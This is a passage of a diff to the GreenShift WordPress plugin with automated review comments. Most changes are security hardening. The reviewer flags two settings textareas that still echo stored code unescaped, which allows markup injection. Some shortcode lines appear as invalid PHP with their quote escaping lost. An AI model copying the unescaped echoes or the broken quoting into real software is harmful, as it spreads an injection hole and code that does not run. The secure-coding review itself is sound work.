- } ?>" placeholder="<?php echo apply_filters('gspb_default_row_width_px', 1200); ?>" />
+ } ?>" placeholder="<?php echo esc_attr(apply_filters('gspb_default_row_width_px', 1200)); ?>" />
</td>
</tr>
<tr>
@@ -924,7 +924,7 @@
</table>
- <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large javascript_delay_submit">
+ <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large javascript_delay_submit">
</div>
</form>
</div>
@@ -1153,7 +1153,7 @@
</table>
- <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+ <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large">
</div>
</form>
</div>
@@ -1310,13 +1310,13 @@
<?php wp_nonce_field('gspb_settings_page_action', 'gspb_settings_field'); ?>
<table class="form-table">
<tr>
- <th> <label for="custom_code_in_head"><?php esc_html_e("Custom code in head section", 'greenshift'); ?></label> </th>
+ <th> <label for="custom_code_in_head"><?php esc_html_e("Custom code in head section", 'greenshift-animation-and-page-builder-blocks'); ?></label> </th>
<td>
<textarea name="custom_code_in_head" id="" cols="30" rows="10" style="width: 100%"><?php echo $custom_code_in_head ?></textarea>
</td>
</tr>
<tr>
- <th> <label for="custom_code_before_closed_body"><?php esc_html_e("Custom code before closed Body", 'greenshift'); ?></label> </th>
+ <th> <label for="custom_code_before_closed_body"><?php esc_html_e("Custom code before closed Body", 'greenshift-animation-and-page-builder-blocks'); ?></label> </th>
<td>
<textarea name="custom_code_before_closed_body" id="" cols="30" rows="10" style="width: 100%"><?php echo $custom_code_before_closed_body ?></textarea>
</td>
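Review bot: The two textareas in this hunk echo `$custom_code_in_head` and `$custom_code_before_closed_body` unescaped; a stored value containing `</textarea>` leaves the textarea and becomes live markup on the settings page, and the commit escapes the labels around them but not the values. Use `<?php echo esc_textarea($custom_code_in_head); ?>` and the same for the second field; esc_textarea() encodes exactly what a textarea body needs and the saved code round-trips unchanged.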
@@ -1492,23 +1492,39 @@
$upload_dir = $upload['basedir'] . '/GreenShift/fonts';
$upload_url = $upload['baseurl'] . '/GreenShift/fonts';
+ // Initialize WordPress Filesystem
+ global $wp_filesystem;
+ if (empty($wp_filesystem)) {
+ require_once(ABSPATH . 'wp-admin/includes/file.php');
+ WP_Filesystem();
+ }
+
foreach (array_keys($files) as $filename) {
foreach ($files[$filename]["error"] as $key => $error) {
if ($error == UPLOAD_ERR_OK) {
$tmp_name = $files[$filename]["tmp_name"][$key];
- $name = basename($files[$filename]["name"][$key]);
- $ext = pathinfo($name, PATHINFO_EXTENSION);
+ $name = sanitize_file_name(basename($files[$filename]["name"][$key]));
+ $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
+
+ // Validate file extension against allowed font types
+ if (!in_array($ext, $this->allowed_font_ext)) continue;
+
+ // Verify the uploaded file is valid
+ if (!is_uploaded_file($tmp_name)) continue;
+
$font_dir = $upload_dir . '/font_' . ($key + 1) . '/' . $ext;
- $this->gspb_rm_rec($font_dir); //clean up dir before download
+ $this->gspb_rm_rec($font_dir); // clean up dir before download
if (!wp_mkdir_p($font_dir)) {
return false;
}
- if(!in_array($ext, $this->allowed_font_ext)) continue;
+ $destination = trailingslashit($font_dir) . $name;
- if (move_uploaded_file($tmp_name, "$font_dir/$name")) {
+ // Read the uploaded file content and write using WP_Filesystem
+ $file_content = $wp_filesystem->get_contents($tmp_name);
+ if ($file_content !== false && $wp_filesystem->put_contents($destination, $file_content, FS_CHMOD_FILE)) {
$result[$key][$ext] = $upload_url . '/font_' . ($key + 1) . '/' . $ext . '/' . $name;
}
}
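Review bot: `WP_Filesystem()` at the top of the hunk is called without checking its result, and `$wp_filesystem` stays null when the configured transport needs credentials, so `$wp_filesystem->get_contents(...)` lower in the loop becomes a fatal call on null. Guard it in the same style as the existing mkdir failure: `if (!WP_Filesystem() || !$wp_filesystem) { return false; }`. Note too that with a non-direct transport (ftpext, ssh2) `get_contents($tmp_name)` reads through that transport rather than the local PHP temp file, so the `!== false` check quietly skips every upload; if only the direct method is expected, say so in a comment, otherwise fall back to `move_uploaded_file()` when `!($wp_filesystem instanceof WP_Filesystem_Direct)`. The enclosing method starts before this hunk.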
@@ -1520,7 +1536,7 @@
public function gspb_rm_rec($path)
{
- if (is_file($path)) return unlink($path);
+ if (is_file($path)) return wp_delete_file($path);
if (is_dir($path)) {
foreach (scandir($path) as $p) if (($p != '.') && ($p != '..'))
$this->gspb_rm_rec($path . '/' . $p);
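Review bot: wp_delete_file() returns void, so `return wp_delete_file($path);` on the is_file branch now returns null where `unlink()` returned a bool; the call sites in this diff ignore the result, but any caller that tests it sees a falsy value for a successful delete. Keep the contract by checking the outcome: `if (is_file($path)) { wp_delete_file($path); return !file_exists($path); }`. The method body continues past the hunk.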
@@ -1548,12 +1564,12 @@
case 'gs-reusable-preview':
- echo '<p><input type="text" style="width:350px" value="[wp_reusable_render id='' . $ID . '']" readonly=""></p>';
- echo '<p>' . esc_html__('If you use template inside other dynamic ajax blocks', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render inlinestyle=1 id='' . $ID . '']" readonly="">';
- echo '<p>' . esc_html__('Shortcode for Ajax render:', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render ajax=1 height=100px id='' . $ID . '']" readonly="">';
- echo '<p>' . esc_html__('Hover trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onhover load-block-' . $ID . '</code>';
- echo '<p>' . esc_html__('Click trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onclick load-block-' . $ID . '</code>';
- echo '<p>' . esc_html__('On view trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onview load-block-' . $ID . '</code>';
+ echo '<p><input type="text" style="width:350px" value="[wp_reusable_render id='' . (int)$ID . '']" readonly=""></p>';
+ echo '<p>' . esc_html__('If you use template inside other dynamic ajax blocks', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render inlinestyle=1 id='' . (int)$ID . '']" readonly="">';
+ echo '<p>' . esc_html__('Shortcode for Ajax render:', 'greenshift-animation-and-page-builder-blocks') . '<br><input type="text" style="width:350px" value="[wp_reusable_render ajax=1 height=100px id='' . (int)$ID . '']" readonly="">';
+ echo '<p>' . esc_html__('Hover trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onhover load-block-' . (int)$ID . '</code>';
+ echo '<p>' . esc_html__('Click trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onclick load-block-' . (int)$ID . '</code>';
+ echo '<p>' . esc_html__('On view trigger:', 'greenshift-animation-and-page-builder-blocks') . ' <code>gs-el-onview load-block-' . (int)$ID . '</code>';
break;
default:
@@ -1589,10